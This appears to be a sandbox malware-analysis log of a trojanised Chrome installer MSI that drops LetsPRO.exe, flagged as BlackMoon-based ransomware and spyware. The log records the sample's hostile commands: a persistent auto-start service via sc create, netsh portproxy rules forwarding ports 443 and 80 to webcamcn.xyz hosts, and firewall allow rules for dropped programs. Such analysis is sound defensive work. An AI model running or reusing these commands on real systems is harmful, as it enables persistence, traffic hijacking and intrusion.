Source: 29.2.LetsPRO.exe.10020253.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
Source: 13.2.LetsPRO.exe.10020253.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
Source: 4.2.LetsPRO.exe.10020253.17.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
Source: 29.2.LetsPRO.exe.1003c7a7.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
Source: 18.2.LetsPRO.exe.1003c7a7.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
Source: classification engine Classification label: mal100.rans.troj.spyw.evad.winMSI@78/175@1/2
Source: C:\Program Files (x86)\ChromeSetup.exe Code function: 16_2_00013040 GetLastError,SetLastError,FormatMessageW,GetLastError,SetLastError,LocalFree, 16_2_00013040
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 4_2_03F37B70 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle, 4_2_03F37B70
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 4_2_03F37740 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges, 4_2_03F37740
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CCA0A17 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,FindCloseChangeNotification, 30_2_6CCA0A17
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 4_2_03F36C50 wsprintfW,MultiByteToWideChar,GetDriveTypeW,GetDiskFreeSpaceExW,_memset,GlobalMemoryStatusEx,swprintf,swprintf, 4_2_03F36C50
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: OpenSCManagerW,GetLastError,CreateServiceW,GetLastError,CloseServiceHandle,CloseServiceHandle, 30_2_6CCAA847
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: OpenSCManagerW,GetLastError,CreateServiceW,GetLastError,CloseServiceHandle,CloseServiceHandle, 30_2_6CCAA4FF
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 4_2_03F36050 _memset,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,CloseHandle, 4_2_03F36050
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 4_2_03F36150 wsprintfW,_memset,lstrcatW,lstrcatW,lstrcatW,CoCreateInstance,wsprintfW,RegOpenKeyExW,_memset,wsprintfW,RegOpenKeyExW,_memset,RegQueryValueExW,lstrcatW,lstrcatW,lstrcatW,RegCloseKey,lstrlenW,lstrcatW, 4_2_03F36150
Source: C:\Program Files (x86)\ChromeSetup.exe Code function: 16_2_00012005 FindResourceW,LoadResource,LockResource,CreateFileW,SizeofResource,SetFilePointerEx,CloseHandle, 16_2_00012005
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CCAA42F OpenSCManagerW,GetLastError,OpenServiceW,ChangeServiceConfigW,GetLastError,CloseServiceHandle,CloseServiceHandle, 30_2_6CCAA42F
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CCAA005 StartServiceCtrlDispatcherW,GetLastError,WaitForSingleObject,CloseHandle, 30_2_6CCAA005
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CCA9F60 StartServiceCtrlDispatcherW,GetLastError,WaitForSingleObject,CloseHandle, 30_2_6CCA9F60
Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0 Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\Microsoft\CMLB5E7.tmp Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7824:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\G{D19BAF17-7C87-467E-8D63-6C4B1C836373}
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\GS-1-5-21-2246122658-3693405117-2476756634-1003{D19BAF17-7C87-467E-8D63-6C4B1C836373}
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Mutant created: \Sessions\1\BaseNamedObjects\2024. 4.21
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Mutant created: \Sessions\1\BaseNamedObjects\2024. 4.23
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\G{A9A86B93-B54E-4570-BE89-42418507707B}
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\TEMP\~DF983CA76AAB82BF40.TMP Jump to behavior
Source: unknown Process created: C:\Windows\System32\cscript.exe cscript C:\Users\user\99944\144977.vbs
Source: C:\Program Files (x86)\ChromeSetup.exe Command line argument: kernel32.dll 16_2_0001260C
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Command line argument: kernel32.dll 30_2_00126898
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Command line argument: DllEntry 30_2_00126898
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: GoogleUpdate.exe String found in binary or memory: Application update/install
Source: GoogleUpdate.exe String found in binary or memory: https://www.google.com/support/installer/?
Source: GoogleUpdate.exe String found in binary or memory: /installerdata=
Source: unknown Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\sutup-Chrome.13.26.x64.msi"
Source: unknown Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding F88407A7EB4CD1FAACECE5C8A82A6774
Source: C:\Windows\System32\msiexec.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
Source: C:\Windows\System32\msiexec.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
Source: C:\Windows\System32\msiexec.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
Source: C:\Windows\System32\msiexec.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
Source: C:\Windows\System32\msiexec.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
Source: C:\Windows\System32\msiexec.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
Source: C:\Windows\System32\msiexec.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
Source: C:\Windows\System32\msiexec.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
Source: unknown Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
Source: C:\Windows\System32\msiexec.exe Process created: C:\Program Files (x86)\ChromeSetup.exe "C:\Program Files (x86)\ChromeSetup.exe"
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
Source: C:\Windows\System32\msiexec.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
Source: C:\Windows\System32\msiexec.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
Source: C:\Windows\System32\msiexec.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
Source: C:\Windows\System32\msiexec.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
Source: C:\Windows\System32\msiexec.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
Source: C:\Windows\System32\msiexec.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
Source: C:\Windows\System32\msiexec.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
Source: C:\Windows\System32\msiexec.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
Source: C:\Program Files (x86)\ChromeSetup.exe Process created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe /installsource taggedmi /install "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={852D075A-CB9D-6360-4E4D-427BBB4F11E1}&lang=zh-CN&browser=3&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&installdataindex=empty"
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
Source: unknown Process created: C:\Windows\System32\cscript.exe cscript C:\Users\user\99944\144977.vbs
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c cscript C:\Users\user\99944\144977.vbs
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cscript.exe cscript C:\Users\user\99944\144977.vbs
Source: C:\Windows\System32\cscript.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe cscript C:\Users\user\99944\144977.vbs
Source: unknown Process created: C:\Windows\System32\sc.exe sc create 144977144 binPath= "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" type= own start= auto displayname= 144977144
Source: unknown Process created: C:\Windows\System32\netsh.exe netsh interface portproxy add v4tov4 listenport=443 connectaddress=156.248.54.11.webcamcn.xyz connectport=443
Source: unknown Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Safe1" dir=in action=allow program="C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
Source: unknown Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Safe2" dir=in action=allow program="C:\Users\GameSafe.exe"
Source: unknown Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Safe3" dir=in action=allow program="C:\Users\GameSafe2.exe"
Source: unknown Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Safe4" dir=in action=allow program="C:\Users\GameSafe3.exe"
Source: unknown Process created: C:\Windows\System32\netsh.exe netsh interface portproxy add v4tov4 listenport=80 connectaddress=hm2.webcamcn.xyz connectport=80
Source: unknown Process created: C:\Windows\System32\taskkill.exe taskkill /f /t /im wegame.exe
Source: unknown Process created: C:\Windows\System32\taskkill.exe taskkill /f /t /im WeGame.exe
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding F88407A7EB4CD1FAACECE5C8A82A6774 Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process created: C:\Program Files (x86)\ChromeSetup.exe "C:\Program Files (x86)\ChromeSetup.exe" Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" Jump to behavior
Source: C:\Program Files (x86)\ChromeSetup.exe Process created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe /installsource taggedmi /install "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={852D075A-CB9D-6360-4E4D-427BBB4F11E1}&lang=zh-CN&browser=3&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&installdataindex=empty" Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cscript.exe cscript C:\Users\user\99944\144977.vbs
Source: C:\Windows\System32\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: msi.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: srpapi.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: tsappcmp.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: windows.storage.dll Jump to behavior
